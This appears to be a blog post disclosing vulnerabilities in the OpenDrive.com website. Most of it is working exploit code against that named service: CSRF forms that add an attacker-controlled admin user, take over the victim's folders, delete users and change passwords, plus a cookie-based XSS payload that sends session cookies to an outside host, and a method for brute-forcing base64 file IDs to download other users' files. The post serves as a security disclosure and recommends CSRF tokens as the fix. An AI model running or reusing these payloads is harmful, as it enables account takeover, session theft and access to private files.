Pwning OpenDrive Users

After a long time being away from bug hunting I randomly found these few bugs in the OpenDrive.com website.

If the attacker can run this code while the user is logged in he can create his own Groups in the users section. This is the proof of concept and you will see groups such as “pwned” being created.

XSRF in Creating Groups

View post on imgur.com

<html>
<!-- Discovered by @OsandaMalith-->
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://www.opendrive.com/ajax", true);
        xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
        xhr.withCredentials = true;
        var body = "action=create-usergroup&group_name=pwned&group_max_storage=5120&group_bw_max=1024";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Click Here to Pwn" onclick="submitRequest();" />
    </form>
  </body>
</html>

Complete Account Takeover XSRF

An attacker can completely takeover the account of any user once he runs the XSRF exploit in the browser while logged in.

Change the email to a new email account in pwn.html and once the victim executes this code the email will receive full admin rights ๐Ÿ™‚ Next execute the GetFolders.html to get full permissions to the victims folders.

The attacker can host these exploits in his server and make the users run them. Please use CSRF tokens to fix this.

File: pwn.html

<html>
<!-- Discovered by @OsandaMalith-->
  <body>
    <form name="0day" action="https://www.opendrive.com/ajax" method="POST">
      <input type="hidden" name="action" value="create-accessuser" />
      <input type="hidden" name="access_first_name" value="Eve" />
      <input type="hidden" name="access_last_name" value="Haxor" />
      <input type="hidden" name="access_password" value="pwned" />
      <input type="hidden" name="access_email" value="youremail@yopmail.com" />
      <input type="hidden" name="access_admin_mode" value="1" />
      <input type="hidden" name="access_notification" value="0" />
      <input type="hidden" name="access_max_storage" value="5120" />
      <input type="hidden" name="access_bw_max" value="1024" />
      <input type="hidden" name="group_id" value="110701" />
      <input type="hidden" name="access_phone" value="123" />
      <input type="hidden" name="access_password_change" value="1" />
      <input type="hidden" name="access_position" value="Tester" />
      <input type="hidden" name="access_send_password" value="1" />
		<input type="submit" value="Click Here to Pwn an account" />
    </form>
  </body>
</html>

View post on imgur.com

View post on imgur.com

View post on imgur.com

Next we take control of all folders. You can clearly see that from the attackers account we were able to access the “confidential.txt” file which was inside the victim’s account.

View post on imgur.com

File: GetFolders

<html>
<!-- Discovered by @OsandaMalith-->
  <body>
    <form name="0day" action="https://www.opendrive.com/ajax" method="POST">
      <input type="hidden" name="action" value="set-folder-access" />
      <input type="hidden" name="access_email" value="haxor15@yopmail.com" />
      <input type="hidden" name="foldersObj[OTZfMTYxOTU0X1ljcFAw]" value="1" />
      <input type="hidden" name="foldersObj[OTZfMTYxOTU1X1FKWFk4]" value="1" />
      <input type="hidden" name="foldersObj[OTZfMTYxOTU2X05DMHlB]" value="1" />
      <input type="hidden" name="foldersObj[OTZfMTYxOTU3X1NKc1Jl]" value="1" />
      <input type="submit" value="Click Here to Pwn the Folders" />
    </form>
  </body>
</html>

View post on imgur.com

Here is a proof of concept video I made to demonstrate this.

Delete Account XSRF

Once a user adds another user into the users list for the deleting option there is no XSRF token used so an attacker can arbitrarily delete the added user by specifying the email.

<html>
  <body>
    <form action="https://www.opendrive.com/ajax" method="POST">
      <input type="hidden" name="action" value="user-delete" />
      <input type="hidden" name="access_email" value="youremail@yopmail.com" />
      <input type="submit" value="Click Here to Delete" />
    </form>
  </body>
</html>

Change Password

View post on imgur.com


We can change the userโ€™s password by the following XSRF exploit.

<html>
  <!-- Discovered by @OsandaMalith -->
  <body>
    <form action="https://www.opendrive.com/settings/profile" method="POST">
      <input type="hidden" name="_wpnonce" value="24ce7b505d" />
      <input type="hidden" name="user_info_old_password" value="OldPassword" />
      <input type="hidden" name="user_info_new_password" value="NewPassword" />
      <input type="hidden" name="user_info_repeat_password" value="NewPassword" />
      <input type="hidden" name="form_action" value="update_password" />
      <input type="submit" value="Change Password" />
    </form>
  </body>
</html>

Cookie Based XSS

I found a Cookie based XSS vulnerability in the domain admin.opendrive.com.

View post on imgur.com

GET /login HTTP/1.1
Host: admin.opendrive.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: login_value="><svg/onload="alert('XSS by Osanda')">;
Connection: keep

View post on imgur.com

curl -i -s -k  -X 'GET'  
-H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0' 
-b 'login_value="><svg/onload="alert(1337)">' 
'http://admin.opendrive.com/login' |  grep 1337 

We can steal the session cookies and get access to other accounts. The cookies are not marked as HTTPOnly. Also not marked as Secure.

View post on imgur.com

Here’s a demonstration of stealing the session cookie ๐Ÿ™‚

<svg/onload=document.location='http://localhost:8000/?'+document.cookie>

View post on imgur.com

Weak Encoding

I noticed that we can easily bruteforce files.

https://dev.opendrive.com/api/v1/download/file.json/OTZfMzA5NDU1Nl8=?inline=1

Base64 decoded = OTZfMzA5NDU1Nl8 =
96_3094556_

We can bruteforce these values and encode back to base64 and download random files of people.

Advertisements

2 thoughts on “Pwning OpenDrive Users

Leave a Reply